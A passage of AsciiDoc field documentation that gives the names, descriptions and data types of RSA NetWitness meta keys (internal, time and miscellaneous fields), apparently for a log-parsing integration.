+ +-- + +*`rsa.internal.forward_ip`*:: ++ +-- +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. + +type: ip + +-- + +*`rsa.internal.forward_ipv6`*:: ++ +-- +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip + +-- + +*`rsa.internal.header_id`*:: ++ +-- +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.lc_cid`*:: ++ +-- +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.lc_ctime`*:: ++ +-- +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: date + +-- + +*`rsa.internal.mcb_req`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most + +type: long + +-- + +*`rsa.internal.mcb_res`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most + +type: long + +-- + +*`rsa.internal.mcbc_req`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams + +type: long + +-- + +*`rsa.internal.mcbc_res`*:: ++ +-- +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams + +type: long + +-- + +*`rsa.internal.medium`*:: ++ +-- +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session + +type: long + +-- + +*`rsa.internal.node_name`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.nwe_callback_id`*:: ++ +-- +This key denotes that event is endpoint related + +type: keyword + +-- + +*`rsa.internal.parse_error`*:: ++ +-- +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.payload_req`*:: ++ +-- +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long + +-- + +*`rsa.internal.payload_res`*:: ++ +-- +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long + +-- + +*`rsa.internal.process_vid_dst`*:: ++ +-- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. + +type: keyword + +-- + +*`rsa.internal.process_vid_src`*:: ++ +-- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. + +type: keyword + +-- + +*`rsa.internal.rid`*:: ++ +-- +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long + +-- + +*`rsa.internal.session_split`*:: ++ +-- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.site`*:: ++ +-- +Deprecated key defined only in table map. + +type: keyword + +-- + +*`rsa.internal.size`*:: ++ +-- +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long + +-- + +*`rsa.internal.sourcefile`*:: ++ +-- +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: keyword + +-- + +*`rsa.internal.ubc_req`*:: ++ +-- +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once + +type: long + +-- + +*`rsa.internal.ubc_res`*:: ++ +-- +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once + +type: long + +-- + +*`rsa.internal.word`*:: ++ +-- +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log + +type: keyword + +-- + + +*`rsa.time.event_time`*:: ++ +-- +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form + +type: date + +-- + +*`rsa.time.duration_time`*:: ++ +-- +This key is used to capture the normalized duration/lifetime in seconds. + +type: double + +-- + +*`rsa.time.event_time_str`*:: ++ +-- +This key is used to capture the incomplete time mentioned in a session as a string + +type: keyword + +-- + +*`rsa.time.starttime`*:: ++ +-- +This key is used to capture the Start time mentioned in a session in a standard form + +type: date + +-- + +*`rsa.time.month`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.day`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.endtime`*:: ++ +-- +This key is used to capture the End time mentioned in a session in a standard form + +type: date + +-- + +*`rsa.time.timezone`*:: ++ +-- +This key is used to capture the timezone of the Event Time + +type: keyword + +-- + +*`rsa.time.duration_str`*:: ++ +-- +A text string version of the duration + +type: keyword + +-- + +*`rsa.time.date`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.year`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.recorded_time`*:: ++ +-- +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. + +type: date + +-- + +*`rsa.time.datetime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.effective_time`*:: ++ +-- +This key is the effective time referenced by an individual event in a Standard Timestamp format + +type: date + +-- + +*`rsa.time.expire_time`*:: ++ +-- +This key is the timestamp that explicitly refers to an expiration. + +type: date + +-- + +*`rsa.time.process_time`*:: ++ +-- +Deprecated, use duration.time + +type: keyword + +-- + +*`rsa.time.hour`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.min`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.timestamp`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.event_queue_time`*:: ++ +-- +This key is the Time that the event was queued. + +type: date + +-- + +*`rsa.time.p_time1`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.tzone`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.eventtime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.gmtdate`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.gmttime`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_date`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_month`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_time`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_time2`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.p_year`*:: ++ +-- +type: keyword + +-- + +*`rsa.time.expire_time_str`*:: ++ +-- +This key is used to capture incomplete timestamp that explicitly refers to an expiration. + +type: keyword + +-- + +*`rsa.time.stamp`*:: ++ +-- +Deprecated key defined only in table map. + +type: date + +-- + + +*`rsa.misc.action`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.result`*:: ++ +-- +This key is used to capture the outcome/result string value of an action in a session. + +type: keyword + +-- + +*`rsa.misc.severity`*:: ++ +-- +This key is used to capture the severity given the session + +type: keyword + +-- + +*`rsa.misc.event_type`*:: ++ +-- +This key captures the event category type as specified by the event source. + +type: keyword + +-- + +*`rsa.misc.reference_id`*:: ++ +-- +This key is used to capture an event id from the session directly + +type: keyword + +-- + +*`rsa.misc.version`*:: ++ +-- +This key captures Version of the application or OS which is generating the event. + +type: keyword + +-- + +*`rsa.misc.disposition`*:: ++ +-- +This key captures the The end state of an action. + +type: keyword + +-- + +*`rsa.misc.result_code`*:: ++ +-- +This key is used to capture the outcome/result numeric value of an action in a session + +type: keyword + +-- + +*`rsa.misc.category`*:: ++ +-- +This key is used to capture the category of an event given by the vendor in the session + +type: keyword + +-- + +*`rsa.misc.obj_name`*:: ++ +-- +This is used to capture name of object + +type: keyword + +-- + +*`rsa.misc.obj_type`*:: ++ +-- +This is used to capture type of object + +type: keyword + +-- + +*`rsa.misc.event_source`*:: ++ +-- +This key captures Source of the event that’s not a hostname + +type: keyword + +-- + +*`rsa.misc.log_session_id`*:: ++ +-- +This key is used to capture a sessionid from the session directly + +type: keyword + +-- + +*`rsa.misc.group`*:: ++ +-- +This key captures the Group Name value + +type: keyword + +-- + +*`rsa.misc.policy_name`*:: ++ +-- +This key is used to capture the Policy Name only. + +type: keyword + +-- + +*`rsa.misc.rule_name`*:: ++ +-- +This key captures the Rule Name + +type: keyword + +-- + +*`rsa.misc.context`*:: ++ +-- +This key captures Information which adds additional context to the event. + +type: keyword + +-- + +*`rsa.misc.change_new`*:: ++ +-- +This key is used to capture the new values of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.space`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.client`*:: ++ +-- +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. + +type: keyword + +-- + +*`rsa.misc.msgIdPart1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msgIdPart2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.change_old`*:: ++ +-- +This key is used to capture the old value of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.operation_id`*:: ++ +-- +An alert number or operation number. The values should be unique and non-repeating. + +type: keyword + +-- + +*`rsa.misc.event_state`*:: ++ +-- +This key captures the current state of the object/item referenced within the event. Describing an on-going event. + +type: keyword + +-- + +*`rsa.misc.group_object`*:: ++ +-- +This key captures a collection/grouping of entities. Specific usage + +type: keyword + +-- + +*`rsa.misc.node`*:: ++ +-- +Common use case is the node name within a cluster. The cluster name is reflected by the host name. + +type: keyword + +-- + +*`rsa.misc.rule`*:: ++ +-- +This key captures the Rule number + +type: keyword + +-- + +*`rsa.misc.device_name`*:: ++ +-- +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc + +type: keyword + +-- + +*`rsa.misc.param`*:: ++ +-- +This key is the parameters passed as part of a command or application, etc. + +type: keyword + +-- + +*`rsa.misc.change_attrib`*:: ++ +-- +This key is used to capture the name of the attribute that’s changing in a session + +type: keyword + +-- + +*`rsa.misc.event_computer`*:: ++ +-- +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. + +type: keyword + +-- + +*`rsa.misc.reference_id1`*:: ++ +-- +This key is for Linked ID to be used as an addition to "reference.id" + +type: keyword + +-- + +*`rsa.misc.event_log`*:: ++ +-- +This key captures the Name of the event log + +type: keyword + +-- + +*`rsa.misc.OS`*:: ++ +-- +This key captures the Name of the Operating System + +type: keyword + +-- + +*`rsa.misc.terminal`*:: ++ +-- +This key captures the Terminal Names only + +type: keyword + +-- + +*`rsa.misc.msgIdPart3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.filter`*:: ++ +-- +This key captures Filter used to reduce result set + +type: keyword + +-- + +*`rsa.misc.serial_number`*:: ++ +-- +This key is the Serial number associated with a physical asset. + +type: keyword + +-- + +*`rsa.misc.checksum`*:: ++ +-- +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. + +type: keyword + +-- + +*`rsa.misc.event_user`*:: ++ +-- +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. + +type: keyword + +-- + +*`rsa.misc.virusname`*:: ++ +-- +This key captures the name of the virus + +type: keyword + +-- + +*`rsa.misc.content_type`*:: ++ +-- +This key is used to capture Content Type only. + +type: keyword + +-- + +*`rsa.misc.group_id`*:: ++ +-- +This key captures Group ID Number (related to the group name) + +type: keyword + +-- + +*`rsa.misc.policy_id`*:: ++ +-- +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise + +type: keyword + +-- + +*`rsa.misc.vsys`*:: ++ +-- +This key captures Virtual System Name + +type: keyword + +-- + +*`rsa.misc.connection_id`*:: ++ +-- +This key captures the Connection ID + +type: keyword + +-- + +*`rsa.misc.reference_id2`*:: ++ +-- +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. + +type: keyword + +-- + +*`rsa.misc.sensor`*:: ++ +-- +This key captures Name of the sensor. Typically used in IDS/IPS based devices + +type: keyword + +-- + +*`rsa.misc.sig_id`*:: ++ +-- +This key captures IDS/IPS Int Signature ID + +type: long + +-- + +*`rsa.misc.port_name`*:: ++ +-- +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). + +type: keyword + +-- + +*`rsa.misc.rule_group`*:: ++ +-- +This key captures the Rule group name + +type: keyword + +-- + +*`rsa.misc.risk_num`*:: ++ +-- +This key captures a Numeric Risk value + +type: double + +-- + +*`rsa.misc.trigger_val`*:: ++ +-- +This key captures the Value of the trigger or threshold condition. + +type: keyword + +-- + +*`rsa.misc.log_session_id1`*:: ++ +-- +This key is used to capture a Linked (Related) Session ID from the session directly + +type: keyword + +-- + +*`rsa.misc.comp_version`*:: ++ +-- +This key captures the Version level of a sub-component of a product. + +type: keyword + +-- + +*`rsa.misc.content_version`*:: ++ +-- +This key captures Version level of a signature or database content. + +type: keyword + +-- + +*`rsa.misc.hardware_id`*:: ++ +-- +This key is used to capture unique identifier for a device or system (NOT a Mac address) + +type: keyword + +-- + +*`rsa.misc.risk`*:: ++ +-- +This key captures the non-numeric risk value + +type: keyword + +-- + +*`rsa.misc.event_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.reason`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.status`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.mail_id`*:: ++ +-- +This key is used to capture the mailbox id/name + +type: keyword + +-- + +*`rsa.misc.rule_uid`*:: ++ +-- +This key is the Unique Identifier for a rule. + +type: keyword + +-- + +*`rsa.misc.trigger_desc`*:: ++ +-- +This key captures the Description of the trigger or threshold condition. + +type: keyword + +-- + +*`rsa.misc.inout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.p_msgid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.data_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.msgIdPart4`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.error`*:: ++ +-- +This key captures All non successful Error codes or responses + +type: keyword + +-- + +*`rsa.misc.index`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.listnum`*:: ++ +-- +This key is used to capture listname or listnumber, primarily for collecting access-list + +type: keyword + +-- + +*`rsa.misc.ntype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.observed_val`*:: ++ +-- +This key captures the Value observed (from the perspective of the device generating the log). + +type: keyword + +-- + +*`rsa.misc.policy_value`*:: ++ +-- +This key captures the contents of the policy. This contains details about the policy + +type: keyword + +-- + +*`rsa.misc.pool_name`*:: ++ +-- +This key captures the name of a resource pool + +type: keyword + +-- + +*`rsa.misc.rule_template`*:: ++ +-- +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template + +type: keyword + +-- + +*`rsa.misc.count`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.number`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sigcat`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comments`*:: ++ +-- +Comment information provided in the log message + +type: keyword + +-- + +*`rsa.misc.doc_number`*:: ++ +-- +This key captures File Identification number + +type: long + +-- + +*`rsa.misc.expected_val`*:: ++ +-- +This key captures the Value expected (from the perspective of the device generating the log). + +type: keyword + +-- + +*`rsa.misc.job_num`*:: ++ +-- +This key captures the Job Number + +type: keyword + +-- + +*`rsa.misc.spi_dst`*:: ++ +-- +Destination SPI Index + +type: keyword + +-- + +*`rsa.misc.spi_src`*:: ++ +-- +Source SPI Index + +type: keyword + +-- + +*`rsa.misc.code`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.agent_id`*:: ++ +-- +This key is used to capture agent id + +type: keyword + +-- + +*`rsa.misc.message_body`*:: ++ +-- +This key captures the The contents of the message body. + +type: keyword + +-- + +*`rsa.misc.phone`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.sig_id_str`*:: ++ +-- +This key captures a string object of the sigid variable. + +type: keyword + +-- + +*`rsa.misc.cmd`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.misc`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cpu`*:: ++ +-- +This key is the CPU time used in the execution of the event being recorded. + +type: long + +-- + +*`rsa.misc.event_desc`*:: ++ +-- +This key is used to capture a description of an event available directly or inferred + +type: keyword + +-- + +*`rsa.misc.sig_id1`*:: ++ +-- +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id + +type: long + +-- + +*`rsa.misc.im_buddyid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_client`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.im_userid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.pid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.priority`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.context_subject`*:: ++ +-- +This key is to be used in an audit context where the subject is the object being identified + +type: keyword + +-- + +*`rsa.misc.context_target`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cve`*:: ++ +-- +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. + +type: keyword + +-- + +*`rsa.misc.fcatnum`*:: ++ +-- +This key captures Filter Category Number. Legacy Usage + +type: keyword + +-- + +*`rsa.misc.library`*:: ++ +-- +This key is used to capture library information in mainframe devices + +type: keyword + +-- + +*`rsa.misc.parent_node`*:: ++ +-- +This key captures the Parent Node Name. Must be related to node variable. + +type: keyword + +-- + +*`rsa.misc.risk_info`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.tcp_flags`*:: ++ +-- +This key is captures the TCP flags set in any packet of session + +type: long + +-- + +*`rsa.misc.tos`*:: ++ +-- +This key describes the type of service + +type: long + +-- + +*`rsa.misc.vm_target`*:: ++ +-- +VMWare Target **VMWARE** only varaible. + +type: keyword + +-- + +*`rsa.misc.workspace`*:: ++ +-- +This key captures Workspace Description + +type: keyword + +-- + +*`rsa.misc.command`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.event_category`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.facilityname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.forensic_info`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.jobname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.mode`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.policy`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.policy_waiver`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.second`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.space1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.subcategory`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.tbdstr2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alert_id`*:: ++ +-- +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.checksum_dst`*:: ++ +-- +This key is used to capture the checksum or hash of the the target entity such as a process or file. + +type: keyword + +-- + +*`rsa.misc.checksum_src`*:: ++ +-- +This key is used to capture the checksum or hash of the source entity such as a file or process. + +type: keyword + +-- + +*`rsa.misc.fresult`*:: ++ +-- +This key captures the Filter Result + +type: long + +-- + +*`rsa.misc.payload_dst`*:: ++ +-- +This key is used to capture destination payload + +type: keyword + +-- + +*`rsa.misc.payload_src`*:: ++ +-- +This key is used to capture source payload + +type: keyword + +-- + +*`rsa.misc.pool_id`*:: ++ +-- +This key captures the identifier (typically numeric field) of a resource pool + +type: keyword + +-- + +*`rsa.misc.process_id_val`*:: ++ +-- +This key is a failure key for Process ID when it is not an integer value + +type: keyword + +-- + +*`rsa.misc.risk_num_comm`*:: ++ +-- +This key captures Risk Number Community + +type: double + +-- + +*`rsa.misc.risk_num_next`*:: ++ +-- +This key captures Risk Number NextGen + +type: double + +-- + +*`rsa.misc.risk_num_sand`*:: ++ +-- +This key captures Risk Number SandBox + +type: double + +-- + +*`rsa.misc.risk_num_static`*:: ++ +-- +This key captures Risk Number Static + +type: double + +-- + +*`rsa.misc.risk_suspicious`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.risk_warning`*:: ++ +-- +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) + +type: keyword + +-- + +*`rsa.misc.snmp_oid`*:: ++ +-- +SNMP Object Identifier + +type: keyword + +-- + +*`rsa.misc.sql`*:: ++ +-- +This key captures the SQL query + +type: keyword + +-- + +*`rsa.misc.vuln_ref`*:: ++ +-- +This key captures the Vulnerability Reference details + +type: keyword + +-- + +*`rsa.misc.acl_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_op`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_pos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.acl_table`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.admin`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alarm_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.alarmname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.app_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.audit`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.audit_object`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.auditdata`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.benchmark`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.bypass`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cache`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cache_hit`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cefversion`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_attr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_obj`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cfg_path`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.changes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.client_ip`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.clustermembers`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_acttimeout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_asn_src`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_bgpv4nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ctr_dst_code`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_dst_tos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_dst_vlan`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_engine_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_engine_type`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_f_switch`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampintv`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_flowsampmode`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inacttimeout`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inpermbyts`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_inpermpckts`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_invalid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ip_proto_ver`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_ipv4_ident`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_l_switch`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_log_did`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_log_rid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_max_ttl`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_maxpcktlen`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_min_ttl`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_minpcktlen`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_1`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_10`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_2`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_3`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_4`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_5`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_6`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_7`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_8`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mpls_lbl_9`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mplstoplabel`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mplstoplabip`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mul_dst_byt`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_mul_dst_pks`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_muligmptype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sampalgo`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sampint`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_seqctr`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_spackets`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_src_tos`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_src_vlan`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_sysuptime`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_template_id`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totbytsexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totflowexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_totpcktsexp`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_unixnanosecs`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_v6flowlabel`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cn_v6optheaders`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_class`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_rbytes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.comp_sbytes`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cpu_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.criticality`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_agency_dst`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_analyzedby`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_other`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_primary`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_av_secondary`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_bgpv6nxthop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_bit9status`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_context`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_control`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_data`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_datecret`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_dst_tld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_eth_dst_ven`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_eth_src_ven`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_event_uuid`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_filetype`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_fld`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_if_desc`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_if_name`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ip_next_hop`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ipv4dstpre`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_ipv4srcpre`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_lifetime`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_log_medium`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_loginname`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_modulescore`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_modulesign`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_opswatresult`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_payload`*:: ++ +-- +type: keyword + +-- + +*`rsa.misc.cs_registrant`*:: ++ +-- +type: keyword + +-- + 